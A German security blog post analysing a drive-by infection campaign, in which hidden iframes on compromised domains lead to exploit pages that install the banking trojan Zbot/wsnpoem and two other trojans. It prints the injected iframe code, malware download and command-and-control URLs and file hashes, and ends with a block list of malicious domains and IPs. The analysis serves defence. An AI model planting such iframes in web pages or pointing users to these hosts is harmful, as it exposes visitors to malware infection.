Tag Archive for 'driveby-exploits'

wsnpoem per DriveBy-Infektion

Ich berichtete in der vergangenen Woche über die Domain mncpssa.org, welche vom Trojaner Emold / AutoRun kontaktiert wird, um den Spam-Mailer PushDo nachzuladen (Siehe Post Emold: Statement.zip). Nun bin ich auf eine interessante Entdeckung gestossen:

Die Domain mncpssa.org zeigt auf den Server mit der IP Adresse 202.191.62.252. Auf demselben Server werden noch drei andere Domains gehostet:

  • cfohello.com.au
  • dadsplace.com.au
  • moreaccess4me.com
  • Was sofort auffällt ist, dass auf der Frontseite dieser Domains sowie auch auf den Unterseiten verdächtige IFrames platziert sind. Ich habe mir deshalb die beiden IFrames, welche auf der Websiete mncpssa.org platziert sind etwas genauer angeschaut:

    IFrame I (utevox.site90.com)

    Der erste IFrame ist in einem obfuskierten Javascript Code versteckt, welcher nach dem Decoden wie folgt aussieht:

    <iframe src=”http:\/\/utevox.site90.com\/f\/index.php” width=”7″ height=”8″ style=”display:none”><\/iframe>

    Dieser erste (obfuskierte) IFrame liefert dem Besucher den Banken-Trojaner WSNPoem (aka Zbot):

    GET http://utevox.site90.com/f/load.php?id=15835&spl=2

    Filename: load.exe
    File size: 47616 bytes
    MD5…: 9420e8e17da3f02e65f27029acf0cfb6
    SHA1..: 3358e8d5bbc95543b6c44896ea946c57ac265cbe
    Erkennungsrate: 23/36 (63.89%)

    Führt man die Datei aus, erstellt die Malware das wsnpoem Verzeichnis sowie die Datei ntos.exe. Mysteriös an dem ganze ist jedoch, dass WSNPoem plötzlich wieder die “alten” Datei- & Verzeichnisnamen verwendet und nicht diejenigen, welche er in der letzten Spam-Welle vom 9. September verwendet hat (Siehe wsnpoem: IPLOGS.zip). Nach der Infektion kontaktiert der Banken-Trojaner die Domain phpnet77.com und holt sich das aktuelle Config-File::

    GET http://phpnet77.com/cfg.bin

    Danach meldet er sich regelmässig über einen PHP-Script beim Server:

    GET http://phpnet77.com/admin66/s.php

    Die Domain ist in keiner der uns bekannten wsnpoem Netblocks (89.187.32.0/19 und 91.203.92.0/22) gehostet sondern bei Yahoo:

    ;; ANSWER SECTION:
    phpnet77.com. 1200 IN A 68.180.151.80
    phpnet77.com. 1200 IN A 68.180.151.27
    phpnet77.com. 1200 IN A 68.180.151.28
    phpnet77.com. 1200 IN A 68.180.151.29
    phpnet77.com. 1200 IN A 68.180.151.30
    phpnet77.com. 1200 IN A 68.180.151.31

    OrgName: Yahoo
    NetRange: 68.180.128.0 – 68.180.255.255
    CIDR: 68.180.128.0/17
    NetName: A-YAHOO-US6

    IFrame II (life-tablets.cn)

    Der zweite IFrame auf der Frontseite erscheint im Klartext:

    <iframe src=”http://life-tablets.cn/tds/index.php” style=”visibility: hidden; display: none”></iframe>

    Nun wird es kompliziert. Ruft man die URL auf, bekommt man ein HTTP 302 (Moved Temorarily) zurück und wird umgeleitet nach:

    http://life-tablets.cn/fi/index.php

    Hier wird nun ein langer Javescript-Code ausgeführt welcher versucht, insgesamt 17 Schwachstellen in verschiedenen Applikationen auszunutzen. Hier ein paar Beispiele:

  • IE ADODB.Stream Object File Installation Weaknes
  • IE WebViewFolderIcon setSlice Overflow
  • MS DirectAnimation ActiveX Vulnerability
  • MS Snapshot Viewer Remote Code Execution
  • MS WksPictureInterface Property Remote DoS
  • Ourgame ActiveX control IEStartNative() buffer overflow
  • Apple Quicktime RTSP URL Handling Buffer Overflow
  • uvm…
  • Ist das ausnützen einer Schwachstelle erfolgreich, infiziert das Script den Besucher mit einer Malware:

    GET http://life-tablets.cn/fi/load.php?id=0

    Filename: load.exe
    File size: 41984 bytes
    MD5…: a7e348da297e9d9a4358aad83dca2c53
    SHA1..: 4aed6b043b0b51726d6b21421058269d8fe91201
    Erkennungsrate: 20/36 (55.56%)

    Nun wird der Besucher erneut mittels einem HTTP 302 Moved Temorarily nach http://fstat.cn/in.cgi?id110 umgeleitet und danach gleich ein weiteres mal nach http://59.125.229.78/tube/in.php. Hier wird nun erneut Schadcode mittels eingebundenen IFrames ausgeführt:

    <iframe src=”http://59.125.229.78/tube/7/index.php” width=1 height=1 style=”visibility: hidden”></iframe>

    <iframe src=”http://fstat.cn/in.cgi?idb1″ width=1 height=1 style=”visibility: hidden”></iframe>

    <iframe src=”http://fstat.cn/tds/in.cgi?default” width=1 height=1 style=”visibility: hidden”></iframe>

    Der erste Link (59.125.229.78) führt dasselbe Script wie bereits oben erwähnt nochmals aus, jedoch ist das Script an einer anderen Stelle gehostet und ein paar Parameter sind abgeändert. Dabei wird uns nach erfolgreichem Ausnützen einer Sicherheitslücke erneut eine weitere Ausführbare Datei Namens load.exe untergejubelt:

    GET http://life-tablets.cn/fi/load.php?id=1916&spl=1

    Filename: load.exe

    http://www.virustotal.com/de/analisis/9e525f9323f7082a5592ff6e458761ea

    File size: 23040 bytes
    MD5…: cb129b294b66fc17cef9f447b35e85e9
    SHA1..: b67259704e4ba5aaae672232d8957e91221c8a0
    Erkennungsrate: 18/36 (50%)

    Die Malware kontaktiert nach der Infektion folgende URLs:

    http://belgius.net/main/controller.php?action=bot

    http://213.115.4.160/polls/get.php

    http://sobalyaki.net/gate/gate.php

    Die beiden letzten IFrames leiten den Besucher schlussendlich zu msn.com und google.com weiter.

    Fazit

    Wir haben eine einzige URL besucht und dabei gleich drei verschiedene Trojaner eingefangen:

    load.exe (cb129b294b66fc17cef9f447b35e85e9 Trojan.Meredrop)
    load.exe (a7e348da297e9d9a4358aad83dca2c53 Win32.Momibot)
    load.exe (9420e8e17da3f02e65f27029acf0cfb6 Zbot/wsnpoem)

    Interessant ist dabei vor Allem Eines: Die Kriminellen hinter WSNPoem scheinen nun neu auch auf DriveBy-Infektionen zu setzten, um ihren Banken-Trojaner unter das Volk zu mischen – wobei es im Moment unklar ist, ob sich hinter dieser neuen WSNPoem Variante um dieselbe Gang handelt wie in den früheren Fällen, oder um eine von ihnen unabhängige Täterschaft. Dies ist problematisch, weil eine Verbreitung über DriveBy-Infektionen heimtückischer ist als über Spam-Mails. Dies zeigt, wie wichtig es ist, die Browser auf einem aktuellen Patchstand zu halten, ein Mimimum an Plugins einzusetzen (denn die sind der Hauptangriffsvektor von DriveBy-Infektionen, nicht mehr der Browser selber), und auch diese auf aktuellem Stand zu halten. Für Firewall-Betreiber empfiehlt es sich, den Zugang zu den folgenden URLs/IPs zu sperren, respektive Lofiles auf Zugriffe auf diese URLs zu scannen:

    utevox.site90.com
    mncpssa.org
    cfohello.com.au
    dadsplace.com.au
    moreaccess4me.com
    phpnet77.com
    life-tablets.cn
    59.125.229.78
    fstat.cn
    belgius.net
    213.115.4.160
    sobalyaki.net
    stabroom.cn
    mp3dowl.com
    69.72.149.7
    78.109.16.218
    78.109.30.5
    yanndex.su
    lobanabucks.cn



    economics-recluse
    Scene
    Urgent!